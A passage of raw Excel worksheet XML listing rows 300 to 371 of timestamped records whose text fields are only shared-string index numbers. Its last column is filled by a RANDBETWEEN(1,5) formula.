      <c r="A300" s="1">
        <v>43553.476840277777</v>
      </c>
      <c r="B300" t="s">
        <v>5</v>
      </c>
      <c r="C300" t="s">
        <v>10</v>
      </c>
      <c r="D300" t="s">
        <v>244</v>
      </c>
      <c r="E300" s="2" t="s">
        <v>383</v>
      </c>
      <c r="F300">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="301" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A301" s="1">
        <v>43553.476805555554</v>
      </c>
      <c r="B301" t="s">
        <v>5</v>
      </c>
      <c r="C301" t="s">
        <v>10</v>
      </c>
      <c r="D301" t="s">
        <v>244</v>
      </c>
      <c r="E301" s="2" t="s">
        <v>383</v>
      </c>
      <c r="F301">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="302" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A302" s="1">
        <v>43553.47216435185</v>
      </c>
      <c r="B302" t="s">
        <v>5</v>
      </c>
      <c r="C302" t="s">
        <v>71</v>
      </c>
      <c r="E302" s="2" t="s">
        <v>384</v>
      </c>
      <c r="F302">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A303" s="1">
        <v>43553.459930555553</v>
      </c>
      <c r="B303" t="s">
        <v>13</v>
      </c>
      <c r="C303" t="s">
        <v>10</v>
      </c>
      <c r="D303" t="s">
        <v>89</v>
      </c>
      <c r="E303" t="s">
        <v>385</v>
      </c>
      <c r="F303">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A304" s="1">
        <v>43553.453738425924</v>
      </c>
      <c r="B304" t="s">
        <v>13</v>
      </c>
      <c r="C304" t="s">
        <v>10</v>
      </c>
      <c r="D304" t="s">
        <v>17</v>
      </c>
      <c r="E304" t="s">
        <v>386</v>
      </c>
      <c r="F304">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="305" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A305" s="1">
        <v>43553.4453125</v>
      </c>
      <c r="B305" t="s">
        <v>13</v>
      </c>
      <c r="C305" t="s">
        <v>48</v>
      </c>
      <c r="E305" s="2" t="s">
        <v>387</v>
      </c>
      <c r="F305">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="306" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A306" s="1">
        <v>43553.440243055556</v>
      </c>
      <c r="B306" t="s">
        <v>19</v>
      </c>
      <c r="C306" t="s">
        <v>6</v>
      </c>
      <c r="D306" t="s">
        <v>25</v>
      </c>
      <c r="E306" s="2" t="s">
        <v>388</v>
      </c>
      <c r="F306">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A307" s="1">
        <v>43553.439687500002</v>
      </c>
      <c r="B307" t="s">
        <v>5</v>
      </c>
      <c r="C307" t="s">
        <v>6</v>
      </c>
      <c r="D307" t="s">
        <v>67</v>
      </c>
      <c r="E307" t="s">
        <v>389</v>
      </c>
      <c r="F307">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A308" s="1">
        <v>43553.434016203704</v>
      </c>
      <c r="B308" t="s">
        <v>13</v>
      </c>
      <c r="C308" t="s">
        <v>10</v>
      </c>
      <c r="D308" t="s">
        <v>20</v>
      </c>
      <c r="E308" t="s">
        <v>390</v>
      </c>
      <c r="F308">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A309" s="1">
        <v>43553.431863425925</v>
      </c>
      <c r="B309" t="s">
        <v>5</v>
      </c>
      <c r="C309" t="s">
        <v>10</v>
      </c>
      <c r="D309" t="s">
        <v>17</v>
      </c>
      <c r="E309" t="s">
        <v>391</v>
      </c>
      <c r="F309">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A310" s="1">
        <v>43553.415000000001</v>
      </c>
      <c r="B310" t="s">
        <v>19</v>
      </c>
      <c r="C310" t="s">
        <v>10</v>
      </c>
      <c r="D310" t="s">
        <v>232</v>
      </c>
      <c r="E310" t="s">
        <v>392</v>
      </c>
      <c r="F310">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="311" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A311" s="1">
        <v>43553.383946759262</v>
      </c>
      <c r="B311" t="s">
        <v>5</v>
      </c>
      <c r="C311" t="s">
        <v>65</v>
      </c>
      <c r="E311" s="2" t="s">
        <v>393</v>
      </c>
      <c r="F311">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A312" s="1">
        <v>43553.383437500001</v>
      </c>
      <c r="B312" t="s">
        <v>13</v>
      </c>
      <c r="C312" t="s">
        <v>10</v>
      </c>
      <c r="D312" t="s">
        <v>52</v>
      </c>
      <c r="E312" t="s">
        <v>394</v>
      </c>
      <c r="F312">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="313" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A313" s="1">
        <v>43553.378125000003</v>
      </c>
      <c r="B313" t="s">
        <v>13</v>
      </c>
      <c r="C313" t="s">
        <v>10</v>
      </c>
      <c r="D313" t="s">
        <v>39</v>
      </c>
      <c r="E313" s="2" t="s">
        <v>395</v>
      </c>
      <c r="F313">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A314" s="1">
        <v>43553.351134259261</v>
      </c>
      <c r="B314" t="s">
        <v>5</v>
      </c>
      <c r="C314" t="s">
        <v>50</v>
      </c>
      <c r="E314" t="s">
        <v>396</v>
      </c>
      <c r="F314">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A315" s="1">
        <v>43553.338761574072</v>
      </c>
      <c r="B315" t="s">
        <v>19</v>
      </c>
      <c r="C315" t="s">
        <v>43</v>
      </c>
      <c r="E315" t="s">
        <v>397</v>
      </c>
      <c r="F315">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A316" s="1">
        <v>43553.335439814815</v>
      </c>
      <c r="B316" t="s">
        <v>13</v>
      </c>
      <c r="C316" t="s">
        <v>16</v>
      </c>
      <c r="E316" t="s">
        <v>398</v>
      </c>
      <c r="F316">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A317" s="1">
        <v>43553.307581018518</v>
      </c>
      <c r="B317" t="s">
        <v>13</v>
      </c>
      <c r="C317" t="s">
        <v>41</v>
      </c>
      <c r="E317" t="s">
        <v>399</v>
      </c>
      <c r="F317">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="318" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A318" s="1">
        <v>43553.293229166666</v>
      </c>
      <c r="B318" t="s">
        <v>13</v>
      </c>
      <c r="C318" t="s">
        <v>48</v>
      </c>
      <c r="E318" s="2" t="s">
        <v>400</v>
      </c>
      <c r="F318">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A319" s="1">
        <v>43553.267893518518</v>
      </c>
      <c r="B319" t="s">
        <v>5</v>
      </c>
      <c r="C319" t="s">
        <v>41</v>
      </c>
      <c r="E319" t="s">
        <v>401</v>
      </c>
      <c r="F319">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="320" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A320" s="1">
        <v>43553.259004629632</v>
      </c>
      <c r="B320" t="s">
        <v>19</v>
      </c>
      <c r="C320" t="s">
        <v>48</v>
      </c>
      <c r="E320" s="2" t="s">
        <v>402</v>
      </c>
      <c r="F320">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A321" s="1">
        <v>43553.254293981481</v>
      </c>
      <c r="B321" t="s">
        <v>9</v>
      </c>
      <c r="C321" t="s">
        <v>41</v>
      </c>
      <c r="E321" t="s">
        <v>403</v>
      </c>
      <c r="F321">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="322" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A322" s="1">
        <v>43553.233807870369</v>
      </c>
      <c r="B322" t="s">
        <v>9</v>
      </c>
      <c r="C322" t="s">
        <v>71</v>
      </c>
      <c r="E322" s="2" t="s">
        <v>404</v>
      </c>
      <c r="F322">
        <f t="shared" ref="F322:F385" ca="1" si="5">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="323" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A323" s="1">
        <v>43553.185925925929</v>
      </c>
      <c r="B323" t="s">
        <v>19</v>
      </c>
      <c r="C323" t="s">
        <v>344</v>
      </c>
      <c r="E323" s="2" t="s">
        <v>405</v>
      </c>
      <c r="F323">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="324" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A324" s="1">
        <v>43553.16201388889</v>
      </c>
      <c r="B324" t="s">
        <v>5</v>
      </c>
      <c r="C324" t="s">
        <v>43</v>
      </c>
      <c r="E324" s="2" t="s">
        <v>406</v>
      </c>
      <c r="F324">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A325" s="1">
        <v>43553.120219907411</v>
      </c>
      <c r="B325" t="s">
        <v>19</v>
      </c>
      <c r="C325" t="s">
        <v>301</v>
      </c>
      <c r="E325" t="s">
        <v>407</v>
      </c>
      <c r="F325">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A326" s="1">
        <v>43553.119062500002</v>
      </c>
      <c r="B326" t="s">
        <v>19</v>
      </c>
      <c r="C326" t="s">
        <v>301</v>
      </c>
      <c r="E326" t="s">
        <v>407</v>
      </c>
      <c r="F326">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A327" s="1">
        <v>43553.083773148152</v>
      </c>
      <c r="B327" t="s">
        <v>35</v>
      </c>
      <c r="C327" t="s">
        <v>408</v>
      </c>
      <c r="E327" t="s">
        <v>409</v>
      </c>
      <c r="F327">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A328" s="1">
        <v>43552.936724537038</v>
      </c>
      <c r="B328" t="s">
        <v>19</v>
      </c>
      <c r="C328" t="s">
        <v>410</v>
      </c>
      <c r="E328" t="s">
        <v>411</v>
      </c>
      <c r="F328">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="329" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A329" s="1">
        <v>43552.928483796299</v>
      </c>
      <c r="B329" t="s">
        <v>19</v>
      </c>
      <c r="C329" t="s">
        <v>189</v>
      </c>
      <c r="E329" s="2" t="s">
        <v>412</v>
      </c>
      <c r="F329">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A330" s="1">
        <v>43552.838935185187</v>
      </c>
      <c r="B330" t="s">
        <v>9</v>
      </c>
      <c r="C330" t="s">
        <v>10</v>
      </c>
      <c r="D330" t="s">
        <v>20</v>
      </c>
      <c r="E330" t="s">
        <v>413</v>
      </c>
      <c r="F330">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A331" s="1">
        <v>43552.759583333333</v>
      </c>
      <c r="B331" t="s">
        <v>5</v>
      </c>
      <c r="C331" t="s">
        <v>29</v>
      </c>
      <c r="E331" t="s">
        <v>414</v>
      </c>
      <c r="F331">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="332" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A332" s="1">
        <v>43552.72115740741</v>
      </c>
      <c r="B332" t="s">
        <v>13</v>
      </c>
      <c r="C332" t="s">
        <v>10</v>
      </c>
      <c r="D332" t="s">
        <v>94</v>
      </c>
      <c r="E332" s="2" t="s">
        <v>415</v>
      </c>
      <c r="F332">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="333" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A333" s="1">
        <v>43552.697743055556</v>
      </c>
      <c r="B333" t="s">
        <v>5</v>
      </c>
      <c r="C333" t="s">
        <v>10</v>
      </c>
      <c r="D333" t="s">
        <v>290</v>
      </c>
      <c r="E333" s="2" t="s">
        <v>416</v>
      </c>
      <c r="F333">
        <f t="shared" ca="1" si="5"/>
        <v>2</v>
      </c>
    </row>
    <row r="334" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A334" s="1">
        <v>43552.697106481479</v>
      </c>
      <c r="B334" t="s">
        <v>19</v>
      </c>
      <c r="C334" t="s">
        <v>10</v>
      </c>
      <c r="D334" t="s">
        <v>271</v>
      </c>
      <c r="E334" s="2" t="s">
        <v>417</v>
      </c>
      <c r="F334">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="335" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A335" s="1">
        <v>43552.689953703702</v>
      </c>
      <c r="B335" t="s">
        <v>13</v>
      </c>
      <c r="C335" t="s">
        <v>10</v>
      </c>
      <c r="D335" t="s">
        <v>52</v>
      </c>
      <c r="E335" s="2" t="s">
        <v>418</v>
      </c>
      <c r="F335">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="336" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A336" s="1">
        <v>43552.658807870372</v>
      </c>
      <c r="B336" t="s">
        <v>13</v>
      </c>
      <c r="C336" t="s">
        <v>10</v>
      </c>
      <c r="D336" t="s">
        <v>52</v>
      </c>
      <c r="E336" s="2" t="s">
        <v>419</v>
      </c>
      <c r="F336">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="337" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A337" s="1">
        <v>43552.635821759257</v>
      </c>
      <c r="B337" t="s">
        <v>5</v>
      </c>
      <c r="C337" t="s">
        <v>10</v>
      </c>
      <c r="D337" t="s">
        <v>17</v>
      </c>
      <c r="E337" s="2" t="s">
        <v>420</v>
      </c>
      <c r="F337">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="338" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A338" s="1">
        <v>43552.602129629631</v>
      </c>
      <c r="B338" t="s">
        <v>13</v>
      </c>
      <c r="C338" t="s">
        <v>10</v>
      </c>
      <c r="D338" t="s">
        <v>20</v>
      </c>
      <c r="E338" s="2" t="s">
        <v>421</v>
      </c>
      <c r="F338">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="339" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A339" s="1">
        <v>43552.600763888891</v>
      </c>
      <c r="B339" t="s">
        <v>35</v>
      </c>
      <c r="C339" t="s">
        <v>10</v>
      </c>
      <c r="D339" t="s">
        <v>6</v>
      </c>
      <c r="E339" s="2" t="s">
        <v>422</v>
      </c>
      <c r="F339">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="340" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A340" s="1">
        <v>43552.587685185186</v>
      </c>
      <c r="B340" t="s">
        <v>19</v>
      </c>
      <c r="C340" t="s">
        <v>10</v>
      </c>
      <c r="D340" t="s">
        <v>89</v>
      </c>
      <c r="E340" s="2" t="s">
        <v>27455</v>
      </c>
      <c r="F340">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="341" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A341" s="1">
        <v>43552.580925925926</v>
      </c>
      <c r="B341" t="s">
        <v>5</v>
      </c>
      <c r="C341" t="s">
        <v>71</v>
      </c>
      <c r="E341" s="2" t="s">
        <v>423</v>
      </c>
      <c r="F341">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="342" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A342" s="1">
        <v>43552.570798611108</v>
      </c>
      <c r="B342" t="s">
        <v>13</v>
      </c>
      <c r="C342" t="s">
        <v>10</v>
      </c>
      <c r="D342" t="s">
        <v>17</v>
      </c>
      <c r="E342" s="2" t="s">
        <v>424</v>
      </c>
      <c r="F342">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="343" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A343" s="1">
        <v>43552.569826388892</v>
      </c>
      <c r="B343" t="s">
        <v>19</v>
      </c>
      <c r="C343" t="s">
        <v>10</v>
      </c>
      <c r="D343" t="s">
        <v>6</v>
      </c>
      <c r="E343" s="2" t="s">
        <v>425</v>
      </c>
      <c r="F343">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="344" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A344" s="1">
        <v>43552.560520833336</v>
      </c>
      <c r="B344" t="s">
        <v>19</v>
      </c>
      <c r="C344" t="s">
        <v>10</v>
      </c>
      <c r="D344" t="s">
        <v>80</v>
      </c>
      <c r="E344" s="2" t="s">
        <v>426</v>
      </c>
      <c r="F344">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A345" s="1">
        <v>43552.55259259259</v>
      </c>
      <c r="B345" t="s">
        <v>19</v>
      </c>
      <c r="C345" t="s">
        <v>10</v>
      </c>
      <c r="D345" t="s">
        <v>23</v>
      </c>
      <c r="E345" t="s">
        <v>427</v>
      </c>
      <c r="F345">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A346" s="1">
        <v>43552.538958333331</v>
      </c>
      <c r="B346" t="s">
        <v>5</v>
      </c>
      <c r="C346" t="s">
        <v>10</v>
      </c>
      <c r="D346" t="s">
        <v>112</v>
      </c>
      <c r="E346" t="s">
        <v>428</v>
      </c>
      <c r="F346">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="347" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A347" s="1">
        <v>43552.537766203706</v>
      </c>
      <c r="B347" t="s">
        <v>13</v>
      </c>
      <c r="C347" t="s">
        <v>16</v>
      </c>
      <c r="E347" s="2" t="s">
        <v>429</v>
      </c>
      <c r="F347">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A348" s="1">
        <v>43552.527256944442</v>
      </c>
      <c r="B348" t="s">
        <v>5</v>
      </c>
      <c r="C348" t="s">
        <v>430</v>
      </c>
      <c r="E348" t="s">
        <v>431</v>
      </c>
      <c r="F348">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A349" s="1">
        <v>43552.514085648145</v>
      </c>
      <c r="B349" t="s">
        <v>9</v>
      </c>
      <c r="C349" t="s">
        <v>41</v>
      </c>
      <c r="E349" t="s">
        <v>432</v>
      </c>
      <c r="F349">
        <f t="shared" ca="1" si="5"/>
        <v>2</v>
      </c>
    </row>
    <row r="350" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A350" s="1">
        <v>43552.507476851853</v>
      </c>
      <c r="B350" t="s">
        <v>13</v>
      </c>
      <c r="C350" t="s">
        <v>48</v>
      </c>
      <c r="E350" s="2" t="s">
        <v>433</v>
      </c>
      <c r="F350">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A351" s="1">
        <v>43552.48809027778</v>
      </c>
      <c r="B351" t="s">
        <v>5</v>
      </c>
      <c r="C351" t="s">
        <v>10</v>
      </c>
      <c r="D351" t="s">
        <v>112</v>
      </c>
      <c r="E351" t="s">
        <v>434</v>
      </c>
      <c r="F351">
        <f t="shared" ca="1" si="5"/>
        <v>2</v>
      </c>
    </row>
    <row r="352" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A352" s="1">
        <v>43552.485543981478</v>
      </c>
      <c r="B352" t="s">
        <v>5</v>
      </c>
      <c r="C352" t="s">
        <v>10</v>
      </c>
      <c r="D352" t="s">
        <v>56</v>
      </c>
      <c r="E352" s="2" t="s">
        <v>435</v>
      </c>
      <c r="F352">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="353" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A353" s="1">
        <v>43552.482268518521</v>
      </c>
      <c r="B353" t="s">
        <v>19</v>
      </c>
      <c r="C353" t="s">
        <v>10</v>
      </c>
      <c r="D353" t="s">
        <v>151</v>
      </c>
      <c r="E353" s="2" t="s">
        <v>436</v>
      </c>
      <c r="F353">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="354" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A354" s="1">
        <v>43552.481053240743</v>
      </c>
      <c r="B354" t="s">
        <v>13</v>
      </c>
      <c r="C354" t="s">
        <v>16</v>
      </c>
      <c r="E354" s="2" t="s">
        <v>437</v>
      </c>
      <c r="F354">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="355" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A355" s="1">
        <v>43552.463356481479</v>
      </c>
      <c r="B355" t="s">
        <v>5</v>
      </c>
      <c r="C355" t="s">
        <v>65</v>
      </c>
      <c r="E355" s="2" t="s">
        <v>438</v>
      </c>
      <c r="F355">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="356" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A356" s="1">
        <v>43552.448784722219</v>
      </c>
      <c r="B356" t="s">
        <v>19</v>
      </c>
      <c r="C356" t="s">
        <v>10</v>
      </c>
      <c r="D356" t="s">
        <v>52</v>
      </c>
      <c r="E356" s="2" t="s">
        <v>439</v>
      </c>
      <c r="F356">
        <f t="shared" ca="1" si="5"/>
        <v>2</v>
      </c>
    </row>
    <row r="357" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A357" s="1">
        <v>43552.439201388886</v>
      </c>
      <c r="B357" t="s">
        <v>13</v>
      </c>
      <c r="C357" t="s">
        <v>10</v>
      </c>
      <c r="D357" t="s">
        <v>6</v>
      </c>
      <c r="E357" s="2" t="s">
        <v>440</v>
      </c>
      <c r="F357">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="358" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A358" s="1">
        <v>43552.434050925927</v>
      </c>
      <c r="B358" t="s">
        <v>19</v>
      </c>
      <c r="C358" t="s">
        <v>10</v>
      </c>
      <c r="D358" t="s">
        <v>158</v>
      </c>
      <c r="E358" s="2" t="s">
        <v>441</v>
      </c>
      <c r="F358">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="359" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A359" s="1">
        <v>43552.42763888889</v>
      </c>
      <c r="B359" t="s">
        <v>19</v>
      </c>
      <c r="C359" t="s">
        <v>41</v>
      </c>
      <c r="E359" s="2" t="s">
        <v>442</v>
      </c>
      <c r="F359">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="360" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A360" s="1">
        <v>43552.427615740744</v>
      </c>
      <c r="B360" t="s">
        <v>19</v>
      </c>
      <c r="C360" t="s">
        <v>41</v>
      </c>
      <c r="E360" s="2" t="s">
        <v>442</v>
      </c>
      <c r="F360">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A361" s="1">
        <v>43552.416446759256</v>
      </c>
      <c r="B361" t="s">
        <v>9</v>
      </c>
      <c r="C361" t="s">
        <v>41</v>
      </c>
      <c r="E361" t="s">
        <v>443</v>
      </c>
      <c r="F361">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A362" s="1">
        <v>43552.412789351853</v>
      </c>
      <c r="B362" t="s">
        <v>13</v>
      </c>
      <c r="C362" t="s">
        <v>10</v>
      </c>
      <c r="D362" t="s">
        <v>36</v>
      </c>
      <c r="E362" t="s">
        <v>444</v>
      </c>
      <c r="F362">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A363" s="1">
        <v>43552.398356481484</v>
      </c>
      <c r="B363" t="s">
        <v>5</v>
      </c>
      <c r="C363" t="s">
        <v>41</v>
      </c>
      <c r="E363" t="s">
        <v>445</v>
      </c>
      <c r="F363">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A364" s="1">
        <v>43552.396249999998</v>
      </c>
      <c r="B364" t="s">
        <v>13</v>
      </c>
      <c r="C364" t="s">
        <v>10</v>
      </c>
      <c r="D364" t="s">
        <v>33</v>
      </c>
      <c r="E364" t="s">
        <v>446</v>
      </c>
      <c r="F364">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="365" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A365" s="1">
        <v>43552.393020833333</v>
      </c>
      <c r="B365" t="s">
        <v>5</v>
      </c>
      <c r="C365" t="s">
        <v>71</v>
      </c>
      <c r="E365" s="2" t="s">
        <v>447</v>
      </c>
      <c r="F365">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A366" s="1">
        <v>43552.374895833331</v>
      </c>
      <c r="B366" t="s">
        <v>9</v>
      </c>
      <c r="C366" t="s">
        <v>448</v>
      </c>
      <c r="E366" t="s">
        <v>449</v>
      </c>
      <c r="F366">
        <f t="shared" ca="1" si="5"/>
        <v>4</v>
      </c>
    </row>
    <row r="367" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A367" s="1">
        <v>43552.371736111112</v>
      </c>
      <c r="B367" t="s">
        <v>35</v>
      </c>
      <c r="C367" t="s">
        <v>65</v>
      </c>
      <c r="E367" s="2" t="s">
        <v>450</v>
      </c>
      <c r="F367">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="368" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A368" s="1">
        <v>43552.334363425929</v>
      </c>
      <c r="B368" t="s">
        <v>13</v>
      </c>
      <c r="C368" t="s">
        <v>124</v>
      </c>
      <c r="E368" s="2" t="s">
        <v>451</v>
      </c>
      <c r="F368">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A369" s="1">
        <v>43552.329074074078</v>
      </c>
      <c r="B369" t="s">
        <v>22</v>
      </c>
      <c r="C369" t="s">
        <v>41</v>
      </c>
      <c r="E369" t="s">
        <v>452</v>
      </c>
      <c r="F369">
        <f t="shared" ca="1" si="5"/>
        <v>3</v>
      </c>
    </row>
    <row r="370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A370" s="1">
        <v>43552.326874999999</v>
      </c>
      <c r="B370" t="s">
        <v>19</v>
      </c>
      <c r="C370" t="s">
        <v>124</v>
      </c>
      <c r="E370" t="s">
        <v>453</v>
      </c>
      <c r="F370">
        <f t="shared" ca="1" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="371" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A371" s="1">
        <v>43552.326805555553</v>
      </c>
      <c r="B371" t="s">
        <v>5</v>
      </c>
